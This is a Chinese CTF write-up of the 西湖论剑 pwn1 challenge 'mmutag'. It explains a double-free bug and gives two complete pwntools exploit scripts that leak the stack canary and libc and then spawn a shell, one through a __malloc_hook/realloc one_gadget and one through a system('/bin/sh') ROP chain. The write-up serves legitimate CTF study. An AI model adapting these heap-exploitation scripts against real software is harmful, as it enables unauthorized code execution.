
西湖论剑


pwn1

这里我赛后看了其他师傅的wp,用了两种方法进行复现。

checksec检查:

Arch:     amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)

利用(第一种方法):

  1. 程序中存在double free漏洞,还给了栈地址。考虑首先将堆申请到栈上控制返回地址,泄露libc
  2. 然后再将one_gadget写到malloc_hook上,发现不行,尝试通过realloc_hook抬高栈。
  3. 最后连续free两次,触发double free检测。double free检测会调用malloc。

exp如下:

#! /usr/bin/env python 

from pwn import *

# Local target process, the challenge binary and the libc it ships with.
# Every libc-relative value below (symbol offsets, the one_gadget offset)
# assumes this exact libc.so.6; it will not transfer to another build.
sh = process('./mmutag')
elf = ELF('./mmutag')
libc=ELF('./libc.so.6')
#context.log_level = 'debug'

# Fixed addresses: the binary has no PIE (checksec above: 0x400000), so PLT/GOT
# entries and the gadget address can be hard-coded.
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
read_plt=elf.plt['read']  # resolved but never used in this script
pop_ret=0x0000000000400d23  # used below as `pop rdi; ret` (rdi = next qword) — presumably; confirm in a disassembler

def welcome(introduce):
    """Choose option 1 of the 'please input your choice:' menu and submit *introduce*."""
    exchanges = (
        ('please input your choice:\n', '1'),
        ('please input your introduce \n', introduce),
    )
    for prompt, reply in exchanges:
        sh.recvuntil(prompt)
        sh.sendline(reply)

def yourself():
    """Choose option 2 of the 'please input your choice:' menu."""
    prompt = 'please input your choice:\n'
    sh.recvuntil(prompt)
    sh.sendline('2')

def add(index,content):
    """Option 1 of the 'please input your choise:' menu: create entry *index*.

    *content* is sent raw (no trailing newline), so binary payloads arrive intact.
    """
    exchanges = (
        ('please input your choise:\n', '1', sh.sendline),
        ('please input your id:\n', str(index), sh.sendline),
        ('input your content\n', content, sh.send),
    )
    for prompt, payload, emit in exchanges:
        sh.recvuntil(prompt)
        emit(payload)

def free(index):
    """Option 2 of the 'please input your choise:' menu: release entry *index*."""
    exchanges = (
        ('please input your choise:\n', '2'),
        ('please input your id:\n', str(index)),
    )
    for prompt, reply in exchanges:
        sh.recvuntil(prompt)
        sh.sendline(reply)

def canary():
    """Option 3: overflow the input buffer up to the stack canary and read it back.

    Sends 23 filler bytes, a 'b' marker and one more 'a'; the 8 bytes echoed
    after the marker are the canary with 0x61 ('a') in its low byte (presumably
    the canary's zero byte got overwritten so the echo does not stop there), so
    0x61 is subtracted out again.  Returns the recovered canary value.
    """
    marker = 'b'
    sh.recvuntil('please input your choise:\n')
    sh.sendline('3')
    sh.send('a' * 23 + marker + 'a')
    sh.recvuntil(marker)
    leaked = u64(sh.recv(8)) - 0x61
    sh.success('canary : ' + hex(leaked))
    return leaked

def fakechunk():
    """Option 3 again, this time writing a fake chunk header (prev_size 0, size 0x71) into the buffer."""
    header = p64(0) + p64(0x71) + p64(0) + '\x00'
    sh.recvuntil('please input your choise:\n')
    sh.sendline('3')
    sh.sendline(header)

# The program prints the address of a stack buffer as the user's "tag" — the
# stack leak that step 1 of the write-up relies on.
sh.recvuntil('please input you name: \n')
sh.sendline('aaaaaaaa')
sh.recvuntil('this is your tag: ')
stack_buf_addr=int(sh.recv(14),16)  # 14 chars: "0x" + 12 hex digits

print 'stack_buf_addr : ',hex(stack_buf_addr)
stack_addr = stack_buf_addr - 0x40  # challenge-specific offset; presumably where the fake chunk header ends up — verify in gdb
sh.success('stack_addr : ' +hex(stack_addr))

welcome('aaaaaa')
yourself()
add(1,'aaaaaa')
add(2,'bbbbbb')
# The double free the write-up identifies: id 1 is freed twice, with id 2
# freed in between.
free(1)
free(2)
free(1)

# NOTE: this rebinds the global name `canary` from the helper function to the
# leaked value, so the helper cannot be called again after this line.
canary=canary()
fakechunk()  # presumably plants the 0x71 header in the same stack buffer canary() overflowed

main_addr=0x0000000000400BF1  # fixed (no PIE); returning here restarts the program for a second round
# add(3) overwrites the doubly-freed chunk's forward pointer with the leaked
# stack address; two allocations later, add(6) is served from the stack
# (write-up step 1).
add(3,p64(stack_addr))
add(4,'a'*8)
add(5,'a'*8)
# Frame overwrite: 8 bytes padding, the leaked canary (so the stack check
# still passes), saved rbp, then a chain that calls puts(puts@got) and
# returns into main.
add(6,'a'*8+p64(canary)+p64(0)+p64(pop_ret)+p64(puts_got)+p64(puts_plt)+p64(main_addr))

# Option 4 presumably returns from the function whose frame was overwritten,
# so the chain runs: puts prints the resolved address of puts, then main restarts.
sh.recvuntil('please input your choise:\n')
sh.sendline('4')
puts_addr = u64(sh.recvuntil('\x7f')[-6:].ljust(8,'\x00'))  # 6 significant bytes of a 64-bit userland pointer
sh.success('puts_addr : ' +hex(puts_addr))
libc_base=puts_addr-libc.symbols['puts']
sh.success('libc_base : ' +hex(libc_base))
malloc_hook=libc_base+libc.symbols['__malloc_hook']
sh.success('malloc_hook : ' +hex(malloc_hook))
one_gadget=libc_base + 0x4527A  # raw offset into the challenge's libc.so.6 — not valid for any other libc build
sh.success('one_gadget : ' +hex(one_gadget))
realloc=libc_base+libc.symbols['realloc']
sh.success('realloc : ' +hex(realloc))

# Second round after main restarted (write-up steps 2-3): same double free,
# but the chunk is now placed just below __malloc_hook.
sh.recvuntil('please input you name: \n')
sh.sendline('aaaaaaaa')
welcome('aaaaaa')
yourself()

free(1)
free(2)
free(1)
add(7,p64(malloc_hook-0x23))  # -0x23: libc-specific alignment giving a usable size field — verify in gdb
add(8,'a'*8)
add(9,'b'*8)
# 0x23 - 0x10 header - 11 bytes of filler puts one_gadget 8 bytes before
# __malloc_hook (presumably the __realloc_hook slot) and realloc+4 at
# __malloc_hook itself; the write-up notes a direct one_gadget in
# __malloc_hook did not work, hence the detour through realloc.
add(10,'a'*3+'b'*8+p64(one_gadget)+p64(realloc+4))
#gdb.attach(sh)
# Freeing the same id twice in a row trips the allocator's double-free check,
# which (per the write-up) ends up calling malloc and therefore the hook.
free(1)
free(1)


#gdb.attach(sh)
sh.interactive()

利用(第二种方法):

  1. 将堆申请到栈上,泄露libc
  2. 再次将堆申请到栈上,控制返回地址getshell

exp如下:

#! /usr/bin/env python


from pwn import *

# Local target process, the challenge binary and the libc it ships with.
# Every libc-relative value below (symbol offsets, the "/bin/sh" offset)
# assumes this exact libc.so.6; it will not transfer to another build.
sh = process('./mmutag')
elf = ELF('./mmutag')
libc=ELF('./libc.so.6')
#context.log_level = 'debug'

# Fixed addresses: the binary has no PIE (checksec above: 0x400000), so PLT/GOT
# entries and the gadget address can be hard-coded.
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
pop_ret=0x0000000000400d23  # used below as `pop rdi; ret` (rdi = next qword) — presumably; confirm in a disassembler

def welcome(introduce):
    """Choose option 1 of the 'please input your choice:' menu and submit *introduce*."""
    exchanges = (
        ('please input your choice:\n', '1'),
        ('please input your introduce \n', introduce),
    )
    for prompt, reply in exchanges:
        sh.recvuntil(prompt)
        sh.sendline(reply)

def yourself():
    """Choose option 2 of the 'please input your choice:' menu."""
    prompt = 'please input your choice:\n'
    sh.recvuntil(prompt)
    sh.sendline('2')

def add(index,content):
    """Option 1 of the 'please input your choise:' menu: create entry *index*.

    *content* is sent raw (no trailing newline), so binary payloads arrive intact.
    """
    exchanges = (
        ('please input your choise:\n', '1', sh.sendline),
        ('please input your id:\n', str(index), sh.sendline),
        ('input your content\n', content, sh.send),
    )
    for prompt, payload, emit in exchanges:
        sh.recvuntil(prompt)
        emit(payload)

def free(index):
    """Option 2 of the 'please input your choise:' menu: release entry *index*."""
    exchanges = (
        ('please input your choise:\n', '2'),
        ('please input your id:\n', str(index)),
    )
    for prompt, reply in exchanges:
        sh.recvuntil(prompt)
        sh.sendline(reply)

def canary():
    """Option 3: overflow the input buffer up to the stack canary and read it back.

    Sends 23 filler bytes, a 'b' marker and one more 'a'; the 8 bytes echoed
    after the marker are the canary with 0x61 ('a') in its low byte (presumably
    the canary's zero byte got overwritten so the echo does not stop there), so
    0x61 is subtracted out again.  Returns the recovered canary value.
    """
    marker = 'b'
    sh.recvuntil('please input your choise:\n')
    sh.sendline('3')
    sh.send('a' * 23 + marker + 'a')
    sh.recvuntil(marker)
    leaked = u64(sh.recv(8)) - 0x61
    sh.success('canary : ' + hex(leaked))
    return leaked

def fakechunk():
    """Option 3 again, this time writing a fake chunk header (prev_size 0, size 0x71) into the buffer."""
    header = p64(0) + p64(0x71) + p64(0) + '\x00'
    sh.recvuntil('please input your choise:\n')
    sh.sendline('3')
    sh.sendline(header)

# The program prints the address of a stack buffer as the user's "tag" — the
# stack leak both rounds of this script rely on.
sh.recvuntil('please input you name: \n')
sh.sendline('aaaaaaaa')
sh.recvuntil('this is your tag: ')
stack_buf_addr=int(sh.recv(14),16)  # 14 chars: "0x" + 12 hex digits

print 'stack_buf_addr : ',hex(stack_buf_addr)
stack_addr = stack_buf_addr - 0x40  # challenge-specific offset; presumably where the fake chunk header ends up — verify in gdb
sh.success('stack_addr : ' +hex(stack_addr))

welcome('aaaaaa')
yourself()
add(1,'aaaaaa')
add(2,'bbbbbb')
# The double free: id 1 is freed twice, with id 2 freed in between.
free(1)
free(2)
free(1)

# NOTE: this rebinds the global name `canary` from the helper function to the
# leaked value, so the helper cannot be called again after this line.
canary=canary()
fakechunk()  # presumably plants the 0x71 header in the same stack buffer canary() overflowed

main_addr=0x0000000000400BF1  # fixed (no PIE); returning here restarts the program for the second round
# add(3) overwrites the doubly-freed chunk's forward pointer with the leaked
# stack address; two allocations later, add(6) is served from the stack
# (write-up step 1).
add(3,p64(stack_addr))
add(4,'a'*8)
add(5,'a'*8)
# Frame overwrite: 8 bytes padding, the leaked canary (so the stack check
# still passes), saved rbp, then a chain that calls puts(puts@got) and
# returns into main.
add(6,'a'*8+p64(canary)+p64(0)+p64(pop_ret)+p64(puts_got)+p64(puts_plt)+p64(main_addr))

# Option 4 presumably returns from the function whose frame was overwritten,
# so the chain runs: puts prints the resolved address of puts, then main restarts.
sh.recvuntil('please input your choise:\n')
sh.sendline('4')
puts_addr = u64(sh.recvuntil('\x7f')[-6:].ljust(8,'\x00'))  # 6 significant bytes of a 64-bit userland pointer
sh.success('puts_addr : ' +hex(puts_addr))
libc_base=puts_addr-libc.symbols['puts']
sh.success('libc_base : ' +hex(libc_base))
system_addr=libc_base+libc.symbols['system']
sh.success('system_addr : ' +hex(system_addr))
bin_sh_addr=libc_base+0x18ce17  # raw offset of the "/bin/sh" string in the challenge's libc.so.6 — not valid for other builds
sh.success('bin_sh_addr : ' +hex(bin_sh_addr))

# Second round after main restarted (write-up step 2): repeat the stack
# allocation, this time with a chain that calls system("/bin/sh").
sh.recvuntil('please input you name: \n')
sh.sendline('aaaaaaaa')
welcome('aaaaaa')
yourself()

fakechunk()  # the fake header has to be re-planted; the stack was rewritten by the first round
free(1)
free(2)
free(1)
add(7,p64(stack_addr-0x10))  # 0x10 lower than round one, so the payload starts at stack_addr itself
add(8,'a'*8)
add(9,'b'*8)
# Frame layout differs from round one by that 0x10: qword of padding, the
# leaked canary, saved rbp, then pop rdi; ret / "/bin/sh" / system / main.
add(10,p64(0)+p64(canary)+p64(0)+p64(pop_ret)+p64(bin_sh_addr)+p64(system_addr)+p64(main_addr))

# Option 4 again triggers the return into the chain.
sh.recvuntil('please input your choise:\n')
sh.sendline('4')

#gdb.attach(sh)
sh.interactive()

剩下的题目有时间再复现。